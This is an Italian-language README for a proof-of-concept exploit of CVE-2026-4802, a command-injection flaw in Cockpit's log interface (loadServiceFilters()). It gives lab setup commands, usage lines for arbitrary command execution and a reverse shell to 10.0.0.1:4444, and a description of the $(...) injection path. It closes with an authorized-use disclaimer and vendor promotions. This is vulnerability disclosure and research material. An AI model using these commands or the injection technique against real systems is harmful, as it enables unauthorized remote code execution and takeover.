
Proof-of-concept exploit per CVE-2026-4802, una vulnerabilità di command injection nell'interfaccia dei log di sistema di Cockpit, che consente l'esecuzione arbitraria di comandi e reverse shell.
Una proof-of-concept per CVE-2026-4802, un'esecuzione di codice remoto tramite iniezione di comandi nell'interfaccia dei log di sistema di Cockpit (loadServiceFilters())
Crea ed esegui l'ambiente vulnerabile:
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln
# Verifica se il target è vulnerabile
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check
# Esegui comandi arbitrari
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"
# Reverse shell
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

pkg/systemd/logsJournal.jsx)La funzione loadServiceFilters() in pkg/systemd/logsJournal.jsx costruisce comandi shell unendo array in stringhe con solo l'escape degli spazi prima di passarli a /bin/bash -ec. I parametri controllati dall'utente dal frammento URL della pagina dei log (es. --since=) raggiungono questo percorso di codice senza essere sanificati, consentendo l'iniezione di metacaratteri shell come la sostituzione di comandi ($(...)).
Questo strumento è destinato esclusivamente a scopi educativi e di ricerca. Utilizzalo solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testare. L'autore non è responsabile di alcun uso improprio o danno causato da questo programma.
QuimeraX Intelligence è una piattaforma avanzata di EASM e Cyber Threat Intelligence specializzata nell'identificazione di vulnerabilità critiche in sistemi complessi. La piattaforma monitora, rileva e segnala proattivamente le minacce alla sicurezza ai clienti, garantendo trasparenza e risposta rapida ai potenziali rischi. I clienti ricevono notifiche immediate e report completi se i loro sistemi risultano vulnerabili, consentendo loro di adottare misure protettive. scopri di più
Hakai Security è un'azienda di cybersecurity fondata da professionisti della sicurezza, impegnata nell'eccellenza tecnica. Offriamo soluzioni di sicurezza su misura, tra cui penetration testing avanzato, simulazioni realistiche di Red Team e pratiche di sviluppo sicuro per proteggere proattivamente gli asset dei nostri clienti dalle minacce informatiche in evoluzione.